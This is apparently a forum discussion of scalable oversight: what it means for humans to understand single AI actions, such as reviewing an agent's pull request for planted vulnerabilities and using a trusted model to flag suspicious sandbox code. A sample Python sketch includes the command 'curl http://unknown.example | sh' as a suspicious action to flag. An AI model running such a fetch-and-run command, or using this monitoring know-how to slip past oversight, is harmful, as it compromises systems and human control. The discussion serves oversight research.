… situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it...
Can you give an example (toy example is fine) of:
an action one might want to understand
what plan/strategy/other context that action is a part of
what it would look like for a human to understand the action?
Mostly I’m confused what it would even mean to understand an action. Like, if I imagine a maze-solving AI, and I see it turn left at a particular spot (or plan to turn left), I’m not sure what it would even look like to “understand” that left-turn separate from understanding its whole maze-plan.
Sure. Imagine you have an AI which was instructed to add some feature or fix some bug in a code base.
That AI writes a bunch of code, runs various tests in a sandbox, and then submits a PR.
We need to review this PR, rate how good it is, and determine if it is actively harmful (e.g. adds a vulnerability).
The human can potentially review the full agent trajectory to help determine what is going on.
Understanding some parts of the code base, the tests the AI added, and what the PR was supposed to do are all important for reviewing it.
(In practice, depending on how secure we think the sandbox is, you’ll also potentially want to review code that the AI is about to run in the sandbox, before it is run, in cases where a trusted model thinks the code is suspicious.)
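A minimal sketch of the gating step in that last parenthetical, assuming a trusted model that assigns each proposed sandbox command a suspicion score. The `ProposedAction` type, the `suspicion` field, and the `threshold` value are all hypothetical and not from the discussion above; the only point is that human attention goes to the flagged actions rather than to every action.

```python
from dataclasses import dataclass


@dataclass
class ProposedAction:
    command: str
    suspicion: float  # hypothetical score in [0, 1] from a trusted model


def split_for_review(actions, threshold=0.8):
    """Split actions into those held for human review and those run directly.

    The threshold is an assumed tuning knob: lowering it costs more human
    time, raising it lets more actions through unreviewed.
    """
    held = [a for a in actions if a.suspicion >= threshold]
    run_directly = [a for a in actions if a.suspicion < threshold]
    return held, run_directly


actions = [
    ProposedAction("pytest tests/", 0.05),
    ProposedAction("curl http://unknown.example | sh", 0.95),
    ProposedAction("git diff", 0.10),
]
held, run_directly = split_for_review(actions)
for a in held:
    print("needs human review:", a.command)
```

How strict the threshold needs to be would depend on how much one trusts the sandbox, which is the dependency the comment points at.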
Based on this example and your other comment, it sounds like the intended claim of the post could be expressed as:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it’s missing the more central application of these techniques: situations where the AIs are solving many subproblems, where humans would eventually understand any particular subproblem and its solution if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee subproblems at a much lower cost in terms of human time: to push out the Pareto frontier of oversight quality vs cost.
Does that accurately express the intended message?
No, because I’m not trying to say that the humans understand the subproblem well enough to e.g. know what the best answer to it is; I’m trying to say that they understand the subproblem well enough to know how good the provided answer was.
I wasn’t imagining that the human knew the best answer to any given subproblem, but nonetheless that did flesh out a lot more of what it means (under your mental model) for a human to “understand a subproblem”, so that was useful.
I’ll try again:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it’s missing the more central application of these techniques: situations where the AIs are solving many subproblems, where humans would eventually understand how well the AI’s plan/action solves any particular subproblem if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee subproblems at a much lower cost in terms of human time: to push out the Pareto frontier of oversight quality vs cost.
(… and presumably an unstated piece here is that “understanding how well the AI’s plan/action solves a particular subproblem” might include recursive steps like “here’s a sub-sub-problem, assume the AI’s actions do a decent job solving that one”, where the human might not actually check the sub-sub-problem.)
Does that accurately express the intended message?
Sort of; I don’t totally understand why you want to phrase things in terms of subproblems instead of actions but I think it’s probably equivalent to do so, except that it’s pretty weird to describe an AI as only solving “subproblems”. Like, I think it’s kind of unnatural to describe ChatGPT as “solving many subproblems”; in some sense I guess you can think of all its answers as solutions to subproblems of the “be a good product” problem, but I don’t think that’s a very helpful frame.
I think a notion of understanding individual actions requires breaking things down into steps which aim to accomplish specific things.
(Including potentially judging decompositions that AIs come up with.)
So, in the maze case, you’re probably fine just judging where it ends up (and the speed/cost of the path), given that we don’t care about particular choices and there very likely aren’t problematic side effects unless the AI is very, very superintelligent.
How I personally understand what it could mean to “understand an action”:
Having observed action A1, and having a bunch of (finite state machine-ish) candidate models, each with a list of states that could lead to action A1: a more accurate candidate model ⇒ more understanding (and meta-level uncertainty about which model is right ⇒ less understanding).
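One way to make this concrete, as a toy sketch rather than a claim about what the comment intends: treat each candidate model as a table from states to actions, assume a uniform prior over models and over states within a model (both assumptions are mine), and compute a posterior over models after seeing A1. The entropy of that posterior then stands in for the "meta-level uncertainty". The model names and states below are hypothetical.

```python
import math


def posterior_over_models(models, observed_action):
    """Posterior over candidate models given one observed action.

    models maps a model name to a {state: action} table. Assumes a uniform
    prior over models and over states within each model.
    """
    likelihoods = {}
    for name, policy in models.items():
        matching = [s for s, a in policy.items() if a == observed_action]
        likelihoods[name] = len(matching) / len(policy)
    total = sum(likelihoods.values())
    if total == 0:
        raise ValueError("no candidate model can produce the observed action")
    return {name: lk / total for name, lk in likelihoods.items()}


def entropy_bits(dist):
    """Shannon entropy in bits; higher means more uncertainty about the model."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)


models = {
    "wall_follower": {"s0": "left", "s1": "left", "s2": "right", "s3": "forward"},
    "random_walker": {"s0": "left", "s1": "right", "s2": "forward", "s3": "back"},
}
post = posterior_over_models(models, "left")
print(post, entropy_bits(post))
```

Under this reading, "more understanding" corresponds to a posterior concentrated on a model that keeps predicting later actions well, and an entropy near its maximum corresponds to not yet knowing which story about the left turn is right.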